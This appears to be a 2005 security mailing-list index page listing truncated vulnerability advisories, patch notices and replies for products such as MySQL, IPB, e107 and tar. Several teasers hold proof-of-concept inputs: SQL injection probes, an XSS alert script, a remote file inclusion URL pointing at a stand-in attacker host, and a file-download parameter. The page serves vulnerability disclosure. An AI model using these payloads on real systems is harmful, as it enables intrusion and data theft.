===========================================================
Ubuntu Security Notice USN-162-1 August 08, 2005
ekg vulnerabilities
CAN-2005-1850, CAN-2005-1851, CAN-2005-1852, CAN-2005-1916,
CAN-2005-2369, CAN-2005-2370, CAN-2005-2448
========================================================

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Buffer Overflow in MySQL User Defined Functions

AppSecInc Team SHATTER Security Advisory MYSQL05-V0002
http://www.appsecinc.com/resources/alerts/mysql/2005-002.html
August 08, 2005

Risk level: LOW

Credits: This vulnerability was discovered and resea

[ more ]  [ reply ]

SVadvisory#13
*******************************
title: SQL injection
product: MYFAQ
version: V1.0
site: http://vpontier.free.fr/
*******************************
========================================================================
=============
Vulnera

[ more ]  [ reply ]

On August 02, 2005, CA released patches to address a buffer
overflow vulnerability in some of the BrightStor ARCserve Backup
and BrightStor Enterprise Backup for Windows application agents.

The patch for BrightStor ARCserve Backup r11.1 Agent for SQL for
Windows (QO70767) did not fully remediate

[ more ]  [ reply ]

T]his BUGS discovered by rUnViRuS
Http://www.security-arab.com
stormhacker (at) hotmail (dot) com [email concealed]
=-=-=-=-=-=-=-=-=
XSS in forums CFBB v1.1.0
Powered by © AderSoftware 2002

=-=-=-=-=-=-=-=-=
exploit

http://www.example.com/forums/index.cfm?page=XSS

=-=-=-=-=-=

[ more ]  [ reply ]

EMC Navisphere Manager Directory Traversal Vulnerability

iDEFENSE Security Advisory 08.05.05
www.idefense.com/application/poi/display?id=288&type=vulnerabilities
August 05, 2005

I. BACKGROUND

EMC Navisphere storage management software is a suite of tools that
enables discovery, monitoring, provi

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: Remote code execution in SysCP
Release Date: 2005/08/09
Last Modified: 2005/08/08
Author:

[ more ]  [ reply ]

While IPB < 1.3 *might* have been vulnerable, IPB 2.x definitely isn't as HTML files are saved with the mime-type "unknown/unknown" which prompts the user to download the file to their desktop making it totally safe.

[ more ]  [ reply ]

E107 + IPB XSS Exploit
memo Works on e107 and IPB "maybe others like xoops not yet tested"

An XSS vulnerability allowed users to inject code
When posting a html attachment

tested succesfully on ipb 1.0.3 all the vers should be vuln
tested on e107 6.*

Patch none yet,
workround. disalow .html as u

[ more ]  [ reply ]

Yes, it is vulnerable. The user inputs as cat_id is not quoted when
retrieving the category text. You can test the vulerability by:

cat_id=2%20and%201=1
cat_id=2%20and%201=2

Patrick Morris wrote:
> Do you have any evidence that there is a real vulerability here, or are
> you basing your assumpt

[ more ]  [ reply ]

Class: Input Validation Error
Remote: Yes
Local: Yes
Credit: ABDUCTER ----> ABDUCTER_MINDS (at) YAHOO (dot) COM [email concealed] {OR} ABDUCTER_MINDS76 (at) HOTMAIL (dot) COM [email concealed]
Vulnerable: Powered by Open Bulletin Board ALL VERSION
******************************************************
info :- openbb is APOPULAR FORUM HAVE MANY VERSI

[ more ]  [ reply ]

>Vulnerable: PortailPHP 2.4 and all version

According to the vendor web site, the most recent version of
PortailPHP is 1.3, released in October 2004.

Was this a typo?

Other reports for SQL injection in an "id" parameter for 1.3 were
publicly made by CENSORED on May 21, 2005, but those reports we

[ more ]  [ reply ]

4.22 07/08/2005

Gravity Board X v1.1 (possibly prior versions)
Remote code execution, SQL Injection / Login Bypass, cross site scripting, path
disclosure poc

software:
author site: http://www.gravityboardx.com/

a) Sql Injection / Login Bypass:

A user can bypass login check and grant administr

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200508-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200508-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

Forte Systems - Iosif Peterfi wrote:

> Ok, so let's split them like this:
>
> 1. Simple
> 1.1 Remote
> 1.2 Local
> 2. Compound
> 2.1 Social engineered
> 2.2 Technical
> 2.3 Local
>
> [...]
> Does this makes sense to anyone ?!

I use "Active" instead of "Simple" and "Passive" instead of

[ more ]  [ reply ]

OS2A

ePing Arbitrary File Creation/Command Execution Vulnerability

OS2A ID: OS2A_1001 Status Published: 08/04/2005 Updated : 08/05/2005
Patch Released

Class: File Creation/Command Execution
Severity: CRITICAL

Overview:
ePing is a ping utility plugin for e107, a PHP-based content

[ more ]  [ reply ]

/*
************************************************************************
*****************************************
$ An open security advisory #11 - Lantronix SCS Local Root Exploits
************************************************************************
************************************

[ more ]  [ reply ]

Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0

The wce.download.php script (present in two locations) can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server.

Example:

http://www.vulnerable.com/oneadmin/faqsupport/wce.dow

[ more ]  [ reply ]

Recently I discovered a method to defeat the much hyped Citi-Bank Virtual
Keyboard Protection which the bank claimed that it defends the customers
against malicious programs like keyloggers, Trojans and spywares etc.

Find the details below -

Description:
Early this year, Citi-Bank introduced the

[ more ]  [ reply ]

the css found when you uploading a file to the server by the "atteched file" function..
in ipb you can upload some HTML file,in the html file write this:
<html>
<body>
<script>alert('Css found By V[i]RuS');</script>
</body>
</html>
when someone will click on the attechment file the script will run.

[ more ]  [ reply ]

(essentially the same as the unzip vulnerability CAN-2005-0602 except
that it only works against the root user)

================================
tar preserves setuid bit
================================

Software: tar
Version: 1.15.1
Software URL: <www.gnu.org/software/tar/tar.html>
Platform: Unix

[ more ]  [ reply ]

Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0

The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file.

Example:

http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.h
acker.com/badscript.p

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Trustix Secure Linux Security Advisory #2005-0040

Package names: bzip2, perl-compress-zlib, proftpd
Summary: Multiple vulnerabilities
Date: 2005-08-

[ more ]  [ reply ]